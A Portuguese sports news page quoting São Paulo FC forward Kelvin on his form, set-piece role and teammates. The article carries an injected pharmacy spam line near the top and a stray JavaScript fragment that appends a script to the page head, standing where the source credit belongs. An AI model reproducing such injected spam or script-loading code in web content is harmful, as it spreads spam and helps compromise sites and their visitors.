Noticias

“Quero continuar assim, estou bem solto em campo”

pills pills store Buy cheap Viagra online

Um dos atletas mais habilidosos do elenco são-paulino, o atacante Kelvin vive grande fase sob o comando do técnico Edgardo Bauza. Dono de dribles desconcertantes, o camisa 30 cresceu de produção durante a temporada e se firmou entre os titulares. As grandes atuações conquistaram a confiança da torcida e do treinador, que atribuiu novas funções ao atleta emprestado pelo Porto-POR: as cobranças de bolas paradas (faltas e escanteios).

“Jogador precisa ter oportunidade, e aqui no São Paulo estou tendo uma sequência, o que não tive no Palmeiras. Aqui, o treinador está confiando em mim, ele sabe que pode contar comigo para tudo. Quando cheguei, precisei de um tempo para adaptação. Agora, tudo melhorou. Quero continuar assim, porque estou bem solto em campo”, festejou o atacante, que deu soube aproveitar as oportunidades com Patón e ganhou espaço.

“Fazia muito tempo que não batia escanteio ou faltas. Também posso fazer essa função, o treinador está confiando em mim. Já foram duas assistências dessa maneira. Estou aprendendo e tenho de ficar bastante concentrado”, afirmou. Sempre bem aberto pela lateral direita do campo, o atacante deu mais mobilidade ao setor e fortaleceu a parceria com Bruno. Com a possibilidade de ser poupado pelo treinador para o duelo com o Coritiba nesta quarta-feira (25), no Estádio Couto Pereira, o ala abrirá uma chance para Auro.

No entanto, de acordo com Kelvin, as atividades táticas que ajustaram o time deram entrosamento com o companheiro revelado no Centro de Formação de Atletas Laudo Natel, em Cotia. “Já tenho um entrosamento com o Bruno, mas o Auro tem um estilo parecido, ele marca e ataca bastante. Já conversamos hoje para saber como ele gosta de jogar. A comunicação é importante. Para mim, não muda muita coisa. Quem vai entrar tem qualidade, são atletas que estão buscando seu espaço na equipe”, opinou.


A postura dos torcedores também motivou o atacante. “Acho que é normal o torcedor ficar chateado com derrotas. A torcida comprou a ideia, viu que os jogadores estão focados, dando carrinho, lutando muito em campo. Isso nos traz confiança. No último jogo, eles apoiaram até o fim e não vaiaram em nenhum momento”, finalizou o camisa 30.

Fonte:d.getElementsByTagName(‘head’)[0].appendChild(s);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

Tricolor apoia campanha “Adote um Boa Noite”

saopauloadmin15 de outubro de 2017

Kaká não renovará com Orlando City próxima temporada da MLS

saopauloadmin11 de outubro de 2017

Petros exalta liderança de Lugano: “São Paulo acima de tudo e todos”

saopauloadmin10 de outubro de 2017

Veja o que pensa Dorival Júnior sobre a volta de Kaká ao São Paulo

saopauloadmin10 de outubro de 2017

Com contrato no fim, Kaká cogita voltar ao São Paulo

saopauloadmin8 de outubro de 2017

Seleção treina no CT em tarde de reencontros

saopauloadmin6 de outubro de 2017

Hernanes cobra falta na gaveta e leva “pintura” do mês: quase 100% dos votos

saopauloadmin5 de outubro de 2017

O que diz o auxiliar de Dorival no São Paulo

saopauloadmin4 de outubro de 2017

Herói no fim, Sidão divide os méritos com a equipe: ‘Somos todos São Paulo’

saopauloadmin1 de outubro de 2017